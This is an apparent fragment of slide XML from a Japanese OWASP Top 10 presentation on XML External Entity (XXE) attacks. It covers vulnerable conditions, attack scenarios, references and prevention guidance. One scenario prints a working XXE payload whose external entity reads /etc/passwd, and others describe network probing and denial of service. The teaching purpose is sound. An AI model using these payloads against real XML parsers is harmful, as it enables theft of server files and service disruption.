                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻撃者はサーバからデータを取り出そうと試みます</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin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&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;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&lt;!DOCTYPE foo [</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&lt;!ELEMENT foo ANY &gt;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"file:///etc/passwd" &gt;]&gt;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&lt;foo&gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>;&lt;/foo&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>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#2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻撃者は、上記の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ENTITY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>行を次のように変更して、サーバーのプライベートネットワークを調べようとします</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>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ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>シナリオ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻撃者は終わりのないファイルを含めることで</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻撃を試みます</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP"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r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   &lt;!ENTITY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rPr>
              <a:t>アプリケーション、特に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ベースの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>サービスやダウンストリーム統合が下記の条件を満たす場合、脆弱である可能性があります</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>アプリケーションが、特に信頼できないソースからの直接またはアップロードによる</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ドキュメントを受け入れる。または、アプリケーションが信頼できないデータを</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ドキュメントに挿入し、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>プロセッサによって解析される。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>アプリケーションまたは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ベースの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>サービスの</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>プロセッサにおいて、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ドキュメントタイプ定義（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>が有効になっている。なお、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DTD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>処理を無効にする実際のメカニズムは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>プロセッサによって異なるため、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XXE Prevention'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>などの資料を参考にすると良い。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>アプリケーションが統合されたセキュリティあるいはシングルサインオン（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）の目的で</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>の処理に</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SAML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>を使用する。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SAML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>は</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>アサーションに</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>を使用しているため、脆弱である可能性がある。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>アプリケーションがバージョン</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>より前の</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>を使用する。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>エンティティが</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>フレームワークに渡されていると、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻撃の影響を受けやすくなる。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻撃に対して脆弱であるということは、アプリケーションが</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Billion Laughs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻撃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>爆弾を使う攻撃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>のような</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻撃に脆弱であるということと、ほぼ同義である。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="143510" indent="-143510">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Testing Guide: Testing for XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>インジェクション</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XXE Vulnerability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Cheat Sheet: XML Security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ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>外部資料</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans"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CWE-611: Improper Restriction of XXE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Billion Laughs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SAML Security XML External Entity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Detecting and exploiting XXE in SAML Interfaces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latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>開発者のトレーニングは、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>を特定し、軽減するために不可欠です。加えて、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>を防ぐには以下のことが不可欠です</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可能な限り、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>などの複雑さの低いデータ形式を使用し、機微なデータのシリアライズを避ける。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>アプリケーションまたは基盤となるオペレーティングシステムで使用されているすべての</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>プロセッサおよびライブラリにパッチをあてるか、アップグレードする。依存関係チェッカーを使用する。そして、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SOAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
